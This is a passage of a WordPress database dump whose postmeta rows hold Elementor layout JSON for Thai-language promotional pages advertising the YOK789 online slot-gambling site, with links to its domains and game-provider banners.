\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2891,354,'_wp_attachment_image_alt','ทดลองเล่นสล็อต'),(2892,391,'_elementor_edit_mode','builder'),(2893,391,'_elementor_template_type','wp-page'),(2894,391,'_elementor_version','3.35.5'),(2895,391,'_elementor_pro_version','3.32.3'),(2896,391,'_wp_page_template','default'),(2897,391,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2898,391,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2899,391,'_thumbnail_id','354'),(2903,392,'_elementor_edit_mode','builder'),(2904,392,'_elementor_template_type','wp-page'),(2905,392,'_elementor_version','3.35.5'),(2906,392,'_elementor_pro_version','3.32.3'),(2907,392,'_wp_page_template','default'),(2908,392,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2909,392,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"uni